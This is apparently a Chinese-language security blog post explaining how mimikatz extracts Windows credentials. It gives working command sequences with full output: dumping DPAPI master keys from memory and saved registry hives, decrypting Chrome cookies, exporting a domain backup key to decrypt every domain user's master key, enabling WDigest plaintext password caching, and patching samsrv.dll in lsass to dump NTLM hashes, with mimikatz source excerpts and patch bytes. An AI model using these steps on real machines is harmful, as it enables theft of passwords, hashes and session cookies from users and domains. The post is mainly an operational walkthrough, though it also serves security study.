0x01DPAPI
對於Windows系統,用戶的加密數據大都采用DPAPI進行存儲,而想要解密這些數據解,必須要獲得DPAPI對應的MasterKey
Master Key:
64字節,用於解密DPAPI blob,使用用戶登錄密碼、SID和16字節隨機數加密后保存在Master Key file中
Master Key file:
二進制文件,可使用用戶登錄密碼對其解密,獲得Master Key
分為兩種:
·用戶Master Key file,位於%APPDATA%\Microsoft\Protect%SID%
·系統Master Key file,位於%WINDIR%\System32\Microsoft\Protect\S-1-5-18\User
Preferred文件:
位於Master Key file的同級目錄,顯示當前系統正在使用的MasterKey及其過期時間,默認90天有效期
獲取masterKey第一種方式
C:\Users\Administrator\Desktop>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 7 2021 23:11:27
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 3802506 (00000000:003a058a)
Session : Interactive from 4
User Name : Administrator
Domain : DESKTOP-PDJ677P
Logon Server : DESKTOP-PDJ677P
Logon Time : 2021/12/27 14:32:09
SID : S-1-5-21-1072968078-1304764695-2190947314-500
[00000000]
* GUID : {9976339e-85ee-48d4-8c0b-e184a5e8e3e7}
* Time : 2021/12/27 14:38:06
* MasterKey : cdbc5c6ca9be21bb584d2a5b692742c7213fff9bc9468929c159ecd5c52214b6b8a0c9760b6b5dc8cab752907cc7ff721bcbc0a83c1a4bb5bcbf9c8d15226ea5
* sha1(key) : 1fce13f1d82b9c434a22722d4680cb18ee1d7624
獲取masterkey第二種方式
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SECURITY SECURITY.hiv
mimikatz(commandline) # lsadump::secrets /system:SystemBkup.hiv /security:SECURITY.hiv
Domain : DESKTOP-PDJ677P
SysKey : eada11fe853dbfd8986ea030bc73c2d4
Local name : DESKTOP-PDJ677P ( S-1-5-21-1072968078-1304764695-2190947314 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {2c76e4db-7dc3-6020-6dbd-61b767e4cb08}
[00] {2c76e4db-7dc3-6020-6dbd-61b767e4cb08} 58d18249d3dccb44cc0a2fbb0be42785f7c9694993f22a87c86d8cf6ac15bea1
Secret : DefaultPassword
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 2d c1 5a ae 74 28 2d 18 fe 3d c4 a3 a2 58 3e 92 08 06 59 ed 8d b0 4a 00 9c 17 80 21 37 06 ef bf 9f 25 0c 4d de a6 ed d5
full: 2dc15aae74282d18fe3dc4a3a2583e92080659ed8db04a009c1780213706efbf9f250c4ddea6edd5
m/u : 2dc15aae74282d18fe3dc4a3a2583e92080659ed / 8db04a009c1780213706efbf9f250c4ddea6edd5
old/hex : 01 00 00 00 2b e4 e1 78 c8 0d 3b 9b ae 34 19 47 ef ea 3d 91 65 36 c4 52 4e 65 dc a9 5e 12 4a 43 50 10 d7 df 19 67 3f a7 61 c0 34 6c
full: 2be4e178c80d3b9bae341947efea3d916536c4524e65dca95e124a435010d7df19673fa761c0346c
m/u : 2be4e178c80d3b9bae341947efea3d916536c452 / 4e65dca95e124a435010d7df19673fa761c0346c
Secret : NL$KM
cur/hex : f1 08 2b af ef 1b 71 55 88 ad 31 b7 98 a6 4a e8 88 a4 02 8e 6f e4 84 25 21 6e 9f c4 15 72 2d 5a 26 6a 5f f5 3c 3a b1 4d b3 be ad e9 03 50 c0 65 d5 1a ce f9 d4 ed b6 10 3d 28 e9 15 3c 63 a5 54
old/hex : f1 08 2b af ef 1b 71 55 88 ad 31 b7 98 a6 4a e8 88 a4 02 8e 6f e4 84 25 21 6e 9f c4 15 72 2d 5a 26 6a 5f f5 3c 3a b1 4d b3 be ad e9 03 50 c0 65 d5 1a ce f9 d4 ed b6 10 3d 28 e9 15 3c 63 a5 54
DPAPI_SYSTEM中的user hash為8db04a009c1780213706efbf9f250c4ddea6edd5,能夠用來解密位於%WINDIR%\System32\Microsoft\Protect\S-1-5-18\User下的系統Master Key file
mimikatz(commandline) # dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\33b5feee-6eba-44ed-b392-259881512a96 /system:8db04a009c1780213706efbf9f250c4ddea6edd5
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {33b5feee-6eba-44ed-b392-259881512a96}
dwFlags : 00000006 - 6
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 6269aa4d9b534424ec150afa4a457e98
rounds : 00001f40 - 8000
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 2995628e6102ca962dd43eb24c502ee567e6f07a292b34db26c39df6f59894526d776415169697e587e99b52aba3734d136ac3011b26eb4603362262f6bfc14458d9dd4d25465919334e17fb64f146c4131f58e78ec21da3e5120faaee7906993bfdc6bc8cf6b13f7f26d07f1938618a2813a6bf3211ab10f2c1fee170902e278ec448aca32790b8cde550582119fd81
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 5e2757215a473242324d956a27ddded1
rounds : 00001f40 - 8000
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 28f3584e2f0ff6e6bcd1f109a77c51457943234933288f0adfad243a9830fbb92c5537a3322ab27ff112001fb3ee16813db20734848b41ed1f118f157d73cfe95eda9830882028eb42d300e32152b037adf244fb235a9cb74803a1ef67267843e6d8f2feea711aef47c1fbe7a7b8d567
[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {00000000-0000-0000-0000-000000000000}
[masterkey] with DPAPI_SYSTEM: 8db04a009c1780213706efbf9f250c4ddea6edd5
key : e90feb451e17403a791af9fabad0b5f6d1b6692688ddc1d290110e83df21ec52577cc851c7d8d99ee03c429eac94e14e6a62a798908cb530cd670a9371cf0a72
sha1: 47cd40c7394d9caa469349d9cb057448d4052d83
之后可以用masterkey解密加密數據如
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:
file:%localappdata%\Google\Chrome\User Data\Default\Cookies
域用戶的masterkey解密
而如果是域用戶的話,是由域用戶的master key就是由域的DPAPI key來保護的,
lsadump::backupkeys /system:DC CONTROLLER /export會得到一個PVK文件,可以用來解密所有域用戶的Master Key,而且這個key是不會改變的。dpapi::masterkey /in:"C:UsersxxxxxAppDataRoamingMicrosoftProtectsid值ca748af3–8b95–40ae-8134-cb9534762688" /pvk:導出的PVK文件這里就可以解密得到域用戶的Master Key值。然后跟上面一樣dpapi::chrome /in:Cookies /masterkey:a3fv34aedd7...,這樣就能解密Cookies的內容了。
0x02mimikatz抓取本地密碼
參考privilege::debug了解調試權限
windows2008之前可以抓取明文密碼(當然還有其他手段如ssp,這里只是說明注冊表手法)
WDigest
從上面文章知道
win8之后抓取明文密碼
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
lsadump::lsa /patch
首先我們看到kuhl_m_lsadump.c
可以看見這里用openpreces開辟了lsass.exe的進程並且獲取了如下句柄
BOOL kuhl_m_lsadump_lsa_getHandle(PKULL_M_MEMORY_HANDLE * hMemory, DWORD Flags)
{
BOOL success = FALSE;
SERVICE_STATUS_PROCESS ServiceStatusProcess;
HANDLE hProcess;
if(kull_m_service_getUniqueForName(L"SamSs", &ServiceStatusProcess))
{
if(hProcess = OpenProcess(Flags, FALSE, ServiceStatusProcess.dwProcessId))
{
if(!(success = kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, hMemory)))
CloseHandle(hProcess);
}
else PRINT_ERROR_AUTO(L"OpenProcess");
}
else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
return success;
}
PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION
對於inject而言就多獲取了一個
因為inject為在lsass.exe下面開辟子進程
這里我們命令是
mimikatz # lsadump::lsa /patch
這里我們patch成功后通過kull_m_patch回調進入NTSTATUS kuhl_m_lsadump_lsa(int argc, wchar_t * argv[])而這里ispatch為true所以我們直接進入到函數這里
到這里就講的很清楚了patch&inject
就是先用LsaOpenPolicy打開lsass.exe句柄然后LsaQueryInformationPolicy檢索當前域信息
然后通過Samconect連接sam api枚舉用戶然后搜索用戶憑據
到這里利用導出NTLM hash
if(!aRemoteThread)
{
status = SamOpenUser(DomainHandle, 0x31b, rid, &hUser);
if(NT_SUCCESS(status))
{
status = SamQueryInformationUser(hUser, UserInternal1Information, &pUserInfoBuffer);
if(NT_SUCCESS(status))
{
kprintf(L"LM : ");
if(pUserInfoBuffer->Internal1.LmPasswordPresent)
kull_m_string_wprintf_hex(pUserInfoBuffer->Internal1.LMHash, LM_NTLM_HASH_LENGTH, 0);
kprintf(L"\nNTLM : ");
if(pUserInfoBuffer->Internal1.NtPasswordPresent)
kull_m_string_wprintf_hex(pUserInfoBuffer->Internal1.NTHash, LM_NTLM_HASH_LENGTH, 0);
kprintf(L"\n");
SamFreeMemory(pUserInfoBuffer);
} else PRINT_ERROR(L"SamQueryInformationUser %08x\n", status);
SamCloseHandle(hUser);
} else PRINT_ERROR(L"SamOpenUser %08x\n", status);
}
這里也有源碼patch的源碼如下x64&x86
檢索到lsass.exe內存中samsrv.dll 的基地址,我們會patch
這里以x64為例子
BYTE PTRN_WALL_SampQueryInformationUserInternal[] = {0x49, 0x8d, 0x41, 0x20};
BYTE PATC_WIN5_NopNop[] = {0x90, 0x90};
BYTE PATC_WALL_JmpShort[] = {0xeb, 0x04};
會在samsrv里面找到內存地址為0x49,0x8d的內存然后執行空指令后繼續替換為0xeb和0x04
紅色斷點標記的位置是被替換為字節"eb 04"的指 "eb 04"是一個4字節的無條件短跳轉——其作用是忽略對值0x20的訪問檢查,流程直接跳轉到調用SAM內部函數_SampRetrieveUserPasswords
最后在SAMPR_USER_INTERNAL1_INFORMATION中打印出ntlm和lm hash
最后
mimikatz # lsadump::lsa /patch
Domain : WIN-3KBTCNK0556 / S-1-5-21-*******
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : ***************
RID : 000001f5 (501)
User : Guest
LM :
當然具體方法也可以參考scz的sam 三篇文章
參考鏈接
DPAPI
scz
scz 03 xp samsrv.dll 解密流程
mimikata /patch /injecr